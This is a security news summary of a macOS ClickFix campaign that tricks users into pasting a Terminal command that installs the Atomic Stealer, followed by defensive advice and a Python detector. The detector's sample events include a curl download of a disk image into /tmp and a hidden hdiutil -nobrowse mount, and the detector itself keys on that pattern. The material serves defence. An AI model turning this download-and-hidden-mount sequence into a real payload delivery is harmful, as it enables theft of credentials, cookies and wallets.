Last updated: July 5, 2026 at 9:01 AM UTC
Tag: atomic-stealer (1 article)

macOS ClickFix attack uses Terminal trick to silently install Atomic Stealer

Palo Alto's Unit 42 found a new macOS campaign that uses the ClickFix trick, a fake CAPTCHA or verification page, to get users to paste a command into Terminal. The command quietly downloads a disk image, mounts it without showing it in Finder, finds the app inside, and launches it, installing the Atomic macOS Stealer (AMOS). The malware then shows a fake system password prompt and steals browser credentials and cookies from many Chromium and Firefox-based browsers, cryptocurrency wallet data, Keychain contents, messaging app data, and documents. The single-command approach is stealthier than older campaigns that relied on the victim manually opening a downloaded image.

Check
Warn Mac users never to paste website-supplied commands into Terminal to pass a CAPTCHA, and watch endpoints for unexpected hdiutil mounts and curl downloads to the /tmp folder.
Affected
macOS users tricked by fake CAPTCHA or verification pages into running a Terminal command; crypto-wallet holders and anyone with browser-stored credentials and Keychain secrets are the main targets.
Fix
Train users to recognize ClickFix lures, restrict or monitor Terminal use on managed Macs, deploy endpoint protection that detects AMOS behavior, and store crypto wallets and secrets in hardware-backed protection.
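
The endpoint check recommended under "Check", as an added example that is not from Unit 42 or the original article: it correlates a curl download into /tmp with an hdiutil mount of the same file by the same user, and raises severity when the mount uses hdiutil's `-nobrowse` option (volume hidden from Finder). The tab-separated event format, the five-minute window, and the sample events are constructed assumptions.

```python
import shlex
from datetime import datetime, timedelta

TMP_PREFIXES = ("/tmp/", "/private/tmp/")
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Constructed sample events: "ISO-timestamp<TAB>user<TAB>command line"
SAMPLE_EVENTS = """\
2026-07-05T08:00:01\talice\tcurl -fsSL https://updates.example.com/tool.pkg -o /Users/alice/Downloads/tool.pkg
2026-07-05T08:14:10\tbob\tcurl -s -o /tmp/verify.dmg https://cdn.example.net/v.dmg
2026-07-05T08:14:12\tbob\thdiutil attach -nobrowse -quiet /tmp/verify.dmg
2026-07-05T08:30:00\tcarol\thdiutil attach /Users/carol/Downloads/Installer.dmg
"""

def curl_tmp_output(argv):
    """Return the /tmp path curl writes to via -o/--output, else None."""
    for i, arg in enumerate(argv[:-1]):
        if arg in ("-o", "--output") and argv[i + 1].startswith(TMP_PREFIXES):
            return argv[i + 1]
    return None

def detect(log_text):
    """Flag hdiutil mounts of an image that curl just wrote under /tmp."""
    downloads = {}  # (user, path) -> time of the curl download
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, cmd = line.split("\t", 2)
        when = datetime.fromisoformat(ts)
        argv = shlex.split(cmd)
        tool = argv[0].rsplit("/", 1)[-1]  # tolerate /usr/bin/curl etc.
        if tool == "curl":
            path = curl_tmp_output(argv)
            if path:
                downloads[(user, path)] = when
        elif tool == "hdiutil" and len(argv) > 1 and argv[1] in ("attach", "mount"):
            for path in (a for a in argv[2:] if a.startswith(TMP_PREFIXES)):
                seen = downloads.get((user, path))
                if seen and when - seen <= WINDOW:
                    hidden = "-nobrowse" in argv  # volume not shown in Finder
                    alerts.append({"user": user, "image": path,
                                   "severity": "high" if hidden else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The parser only recognises curl's separate `-o`/`--output` argument form; a production rule would also need to handle combined short flags and output paths resolved relative to the working directory.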